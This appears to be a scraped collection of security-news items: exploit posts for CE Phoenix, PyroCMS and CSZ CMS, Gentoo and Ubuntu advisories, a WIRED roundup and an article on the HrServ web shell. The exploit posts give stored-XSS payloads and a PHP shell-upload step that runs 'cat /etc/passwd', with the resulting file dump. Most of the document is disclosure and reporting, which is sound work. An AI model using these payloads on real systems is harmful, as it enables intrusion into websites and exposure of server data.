CE Phoenix version 1.0.8.20 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: CE Phoenix Version 1.0.8.20  - Stored XSS# Date: 2023-11-25# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://phoenixcart.org/# Version: v3.0.1# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix## POC:1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php4-You will be see alert button

CE Phoenix 1.0.8.20 Cross Site Scripting

PyroCMS version 3.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: PyroCMS v3.0.1  - Stored XSS# Date: 2023-11-25# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://pyrocms.com/# Version: v3.0.1# Tested on: https://www.softaculous.com/apps/cms/PyroCMS----------------------------------------------------------------------------------------------------1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/12-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//3-Save it and go to this url : https://127.0.0.1/public/admin/redirects4-You will be see alert button

PyroCMS 3.0.1 Cross Site Scripting

Gentoo Linux Security Advisory 202311-7 - A vulnerability has been found in AIDE which can lead to root privilege escalation. Versions greater than or equal to 0.17.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: AIDE: Root Privilege Escalation  
     Date: November 25, 2023  
     Bugs: #831658  
       ID: 202311-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in AIDE which can lead to root privilege  
escalation.

Background  
==========

AIDE (Advanced Intrusion Detection Environment) is a file and directory  
integrity checker.

It creates a database from the regular expression rules that it finds  
from the config file(s). Once this database is initialized it can be  
used to verify the integrity of the files. It has several message digest  
algorithms (see below) that are used to check the integrity of the file.  
All of the usual file attributes can also be checked for  
inconsistencies.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
app-forensics/aide  < 0.17.4      >= 0.17.4

Description  
===========

A vulnerability has been discovered in AIDE. Please review the CVE  
identifier referenced below for details.

Impact  
======

AIDE before 0.17.4 allows local users to obtain root privileges via  
crafted file metadata (such as XFS extended attributes or tmpfs ACLs),  
because of a heap-based buffer overflow.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All AIDE users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-forensics/aide-0.17.4"

References  
==========

[ 1 ] CVE-2021-45417  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45417

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-07

Gentoo Linux Security Advisory 202311-6 - Multiple vulnerabilities have been discovered in multipath-tools, the worst of which can lead to root privilege escalation. Versions greater than or equal to 0.9.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: multipath-tools: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #878763  
       ID: 202311-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in multipath-tools, the  
worst of which can lead to root privilege escalation.

Background  
==========

multipath-tools are used to drive the Device Mapper multipathing driver.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
sys-fs/multipath-tools  < 0.9.3       >= 0.9.3

Description  
===========

Multiple vulnerabilities have been discovered in multipath-tools. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All multipath-tools users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-fs/multipath-tools-0.9.3"

References  
==========

[ 1 ] CVE-2022-41973  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41973  
[ 2 ] CVE-2022-41974  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41974

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-06

Gentoo Linux Security Advisory 202311-4 - Multiple vulnerabilities have been discovered in Zeppelin, the worst of which could lead to remote code execution. Versions greater than or equal to 0.10.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Zeppelin: Multiple Vulnerabilities  
     Date: November 24, 2023  
     Bugs: #811447  
       ID: 202311-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Zeppelin, the worst of  
which could lead to remote code execution.

Background  
==========

Apache Zeppelin is a web-based notebook that enables data-driven,  
interactive data analytics and collaborative documents with SQL, Scala,  
Python, R and more.

Affected packages  
=================

Package                Vulnerable    Unaffected  
---------------------  ------------  ------------  
www-apps/zeppelin-bin  < 0.10.1      >= 0.10.1

Description  
===========

Multiple vulnerabilities have been discovered in Zeppelin. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Zeppelin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-apps/zeppelin-bin-0.10.1"

References  
==========

[ 1 ] CVE-2019-10095  
      https://nvd.nist.gov/vuln/detail/CVE-2019-10095  
[ 2 ] CVE-2020-13929  
      https://nvd.nist.gov/vuln/detail/CVE-2020-13929  
[ 3 ] CVE-2021-27578  
      https://nvd.nist.gov/vuln/detail/CVE-2021-27578

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-04

Ubuntu Security Notice 6509-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. It was discovered that Firefox did not properly manage memory when images were created on the canvas element. An attacker could potentially exploit this issue to obtain sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6509-1November 23, 2023firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2023-6206,CVE-2023-6210, CVE-2023-6211, CVE-2023-6212, CVE-2023-6213)It was discovered that Firefox did not properly manage memory whenimages were created on the canvas element. An attacker could potentiallyexploit this issue to obtain sensitive information. (CVE-2023-6204)It discovered that Firefox incorrectly handled certain memory when using aMessagePort. An attacker could potentially exploit this issue to cause adenial of service. (CVE-2023-6205)It discovered that Firefox incorrectly did not properly manage ownershipin ReadableByteStreams. An attacker could potentially exploit this issueto cause a denial of service. (CVE-2023-6207)It discovered that Firefox incorrectly did not properly manage copyoperations when using Selection API in X11. An attacker could potentiallyexploit this issue to obtain sensitive information. (CVE-2023-6208)Rachmat Abdul Rokhim discovered incorrectly handled parsing of relativeURLS starting with "///". An attacker could potentially exploit this issueto cause a denial of service. (CVE-2023-6209)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   firefox                         120.0+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:   https://ubuntu.com/security/notices/USN-6509-1   CVE-2023-6204, CVE-2023-6205, CVE-2023-6206, CVE-2023-6207,   CVE-2023-6208, CVE-2023-6209, CVE-2023-6210, CVE-2023-6211,   CVE-2023-6212, CVE-2023-6213Package Information:   https://launchpad.net/ubuntu/+source/firefox/120.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6509-1

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

**CSZ CMS 1.3.0 Shell Upload**

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

**CSZ CMS 1.3.0 Shell Upload**

    # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

**File Tags**

*   ActiveX (932)
*   Advisory (83,267)
*   Arbitrary (16,401)
*   BBS (2,859)
*   Bypass (1,803)
*   CGI (1,029)
*   Code Execution (7,417)
*   Conference (682)
*   Cracker (843)
*   CSRF (3,353)
*   DoS (23,990)
*   Encryption (2,372)
*   Exploit (52,241)
*   File Inclusion (4,233)
*   File Upload (977)
*   Firewall (822)
*   Info Disclosure (2,807)
*   Intrusion Detection (900)
*   Java (3,091)
*   JavaScript (879)
*   Kernel (6,834)
*   Local (14,569)
*   Magazine (586)
*   Overflow (12,849)
*   Perl (1,426)
*   PHP (5,162)
*   Proof of Concept (2,349)
*   Protocol (3,652)
*   Python (1,566)
*   Remote (31,026)
*   Root (3,605)
*   Rootkit (515)
*   Ruby (614)
*   Scanner (1,645)
*   Security Tool (7,926)
*   Shell (3,209)
*   Shellcode (1,216)
*   Sniffer (897)
*   Spoof (2,229)
*   SQL Injection (16,436)
*   TCP (2,419)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,079)
*   Web (9,786)
*   Whitepaper (3,757)
*   x86 (966)
*   XSS (18,042)
*   Other

**File Archives**

*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   Older

**Systems**

*   AIX (429)
*   Apple (2,037)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,907)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,375)
*   HPUX (880)
*   iOS (363)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (47,744)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (14,557)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,110)
*   UNIX (9,338)
*   UnixWare (187)
*   Windows (6,605)
*   Other

CSZ CMS 1.3.0 Shell Upload

Gentoo Linux Security Advisory 202311-3 - Multiple vulnerabilities have been discovered in SQLite, the worst of which may lead to code execution. Versions greater than or equal to 3.42.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: SQLite: Multiple Vulnerabilities  
     Date: November 24, 2023  
     Bugs: #886029, #906114  
       ID: 202311-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in SQLite, the worst of  
which may lead to code execution.

Background  
==========

SQLite is a C library that implements an SQL database engine.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-db/sqlite  < 3.42.0      >= 3.42.0

Description  
===========

Multiple vulnerabilities have been discovered in SQLite. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SQLite users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-db/sqlite-3.42.0"

References  
==========

[ 1 ] CVE-2021-31239  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31239  
[ 2 ] CVE-2022-46908  
      https://nvd.nist.gov/vuln/detail/CVE-2022-46908

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-03

Plus: North Korean supply chain attacks, a Russian USB worm spreads internationally, and more.

Trillions of domestic phone records in the United States are tracked every year under a secretive surveillance operation, WIRED revealed this week. The Data Analytical Services program, which was previously known as Hemisphere, allows cops to request and analyze the phone records of people and others who they communicate with, including those not suspected of crimes. The surveillance system is run by the White House, with telecom firm AT&T providing phone records in response to law enforcement requests.

The crypto world kept tumbling this week. After Sam Bankman-Fried was found guilty at the start of this month, it was the turn of crypto exchange Binance and its CEO Changpeng Zhao to face scrutiny from US officials. The US Department of Justice unsealed an indictment against the company, which accuses it of violating US anti-money-laundering laws and of enabling Iran, Cuba, and Russia to launder dirty money.

If you’re in the US and have some extra time over the long holiday weekend, it’s also worth catching up on Andy Greenberg’s epic tale of the three young hackers twho brought down the internet with the Mirai botnet—and their story of redemption. Then it’s definitely time to log off.

That’s not all. Each week, we round up the security and privacy stories we didn’t report on in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

Google makes most of its money from advertising—and it doesn’t like ad blockers, which prevent millions of ads being shown on websites every day. In recent months, the company has been cracking down on ad blockers on YouTube in a big way. But that’s just the start of it.

This week YouTube confirmed it has, in some instances, introduced a five-second delay before videos load if people are using an ad blocker in their browser. “In the past week, users using ad blockers may have experienced suboptimal viewing, which included delays in loading, regardless of the browser they are using,” a YouTube spokesperson told The Verge. The company admitted the delays had been happening after some people on Reddit and Hacker News spotted slow loading times and initially thought it was because of the browser they were using.

The move follows Google announcing last week that it is going ahead with plans to change how Chrome browser extensions operate, which may limit how some popular ad blockers work. Last year the company paused its plans to roll out Manifest V3, the platform that browser extensions work on, after complaints about how it would impact some extensions. As Ars Technica reported, Google is planning on rolling out a revised version of Manifest V3 in June next year. Google says Manifest V3 is designed to make Chrome run smoothly by reducing the resources that extensions can use and improve security. However ad blockers and privacy experts have criticized how the system works and, in particular, changes to the Declarative Net Request API.

Google proposed putting restrictions on this API but has relaxed these somewhat in the new version of Manifest V3. It originally planned to allow browser extensions to make 5,000 content-filtering “rules,” but it has now increased this to 30,000 rules. AdGuard, an ad blocker, has tentatively welcomed some of the revised changes. Elsewhere, uBlock Origin, which uses around 300,000 filtering rules, has created a “lite” version of its extension in response to Manifest V3. The developer behind uBlock Origin says the lite version is not as “capable” as the full version. Meanwhile, browser makers Brave and Firefox say they are introducing work-arounds to stop ad blockers from being impacted by the changes.

Supply chain attacks, where malware is implanted in a company's legitimate software and spread to the firm's customers, can be incredibly hard to detect and can cause billions of dollars in damage if they’re successful. Hackers for North Korea are increasingly adopting the sophisticated attack method.

This week Microsoft revealed it has discovered the hermit kingdom’s hackers implanting malicious code inside an installer file for photo and video editing software CyberLink. The installer file used legitimate code from CyberLink and was hosted on the company's servers, obscuring the malicious file it contained. Once installed, Microsoft said, the malicious file would deploy a second payload. More than 100 devices have been impacted by the attack, Microsoft says, and it has attributed the attack to the North Korea-based Diamond Sleet hacking group.

After details of the attack were revealed, the UK’s National Cyber Security Centre and the Republic of Korea’s National Intelligence Service issued a warning saying that North Korea’s supply chain attacks are “growing in sophistication and volume.” The two bodies say the tactics support North Korea’s wider priorities, such as stealing money to help fund its ailing economy and nuclear programs, espionage, and stealing tech secrets.

Some flights have had to change course or lost satellite signals in midair due to electronic warfare, _The New York Times_ reported this week. The ongoing conflicts in Ukraine and Gaza have seen GPS jamming and spoofing technologies interfere with the daily operation of flights in and around the areas. The incidents, so far, have not been dangerous. But they highlight the increase in electronic warfare capabilities—which seek to interrupt or disrupt the technologies used for communications and infrastructure—and how the technology needed to launch them is getting cheaper. Since Russia’s full-scale invasion of Ukraine in February 2022, electronic warfare tactics have become increasingly common on both sides, as drones being used for surveillance and reconnaissance have had their signals interrupted and rockets have been sent off course.

Gamaredon is one of Russia’s most brazen hacking groups—the hackers have consistently attacked Ukrainian systems. Now one piece of its malware, a worm that spreads via USB stick and is dubbed LitterDrifter, has spread internationally. The worm has been spotted in the US, Hong Kong, Germany, Poland, and Vietnam, according to researchers at security firm Check Point. The company’s researchers say the worm includes two elements: a spreading module and a second module that also communicates with Gamaredon’s servers. “It’s clear that LitterDrifter was designed to support a large-scale collection operation,” the Check Point researchers write, adding that it’s likely the worm has “spread beyond its intended targets.”

Google’s Ad Blocker Crackdown Is Growing

An unspecified government entity in Afghanistan was targeted by a previously undocumented web shell called HrServ in what’s suspected to be an advanced persistent threat (APT) attack.
The web shell, a dynamic-link library (DLL) named “hrserv.dll,” exhibits “sophisticated features such as custom encoding methods for client communication and in-memory execution,” Kaspersky security researcher Mert

Cyber Attack / Threat Intelligence

An unspecified government entity in Afghanistan was targeted by a previously undocumented web shell called **HrServ** in what's suspected to be an advanced persistent threat (APT) attack.

The web shell, a dynamic-link library (DLL) named "hrserv.dll," exhibits "sophisticated features such as custom encoding methods for client communication and in-memory execution," Kaspersky security researcher Mert Degirmenci said in an analysis published this week.

The Russian cybersecurity firm said it identified variants of the malware dating all the way back to early 2021 based on the compilation timestamps of these artifacts.

Web shells are typically malicious tools that provide remote control over a compromised server. Once uploaded, it allows threat actors to carry out a range of post-exploitation activities, including data theft, server monitoring, and lateral advancement within the network.

The attack chain involves the PAExec remote administration tool, an alternative to PsExec that's used as a launchpad to create a scheduled task that masquerades as a Microsoft update ("MicrosoftsUpdate"), which subsequently is configured to execute a Windows batch script ("JKNLA.bat").

The Batch script accepts as an argument the absolute path to a DLL file ("hrserv.dll") that's then executed as a service to initiate an HTTP server that's capable of parsing incoming HTTP requests for follow-on actions.

"Based on the type and information within an HTTP request, specific functions are activated," Degirmenci said, adding "the GET parameters used in the hrserv.dll file, which is used to mimic Google services, include 'hl.'"

This is likely an attempt by the threat actor to blend these rogue requests in network traffic and make it a lot more challenging to distinguish malicious activity from benign events.

Embedded within those HTTP GET and POST requests is a parameter called cp, whose value – ranging from 0 to 7 – determines the next course of action. This includes spawning new threads, creating files with arbitrary data written to them, reading files, and accessing Outlook Web App HTML data.

If the value of cp in the POST request equals "6," it triggers code execution by parsing the encoded data and copying it into the memory, following which a new thread is created and the process enters a sleep state.

The web shell is also capable of activating the execution of a stealthy "multifunctional implant" in memory that's responsible for erasing the forensic trail by deleting the "MicrosoftsUpdate" job as well as the initial DLL and batch files.

The threat actor behind the web shell is currently not known, but the presence of several typos in the source code indicates that the malware author is not a native English speaker.

"Notably, the web shell and memory implant use different strings for specific conditions," Degirmenci concluded. "In addition, the memory implant features a meticulously crafted help message."

"Considering these factors, the malware's characteristics are more consistent with financially motivated malicious activity. However, its operational methodology exhibits similarities with APT behavior."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web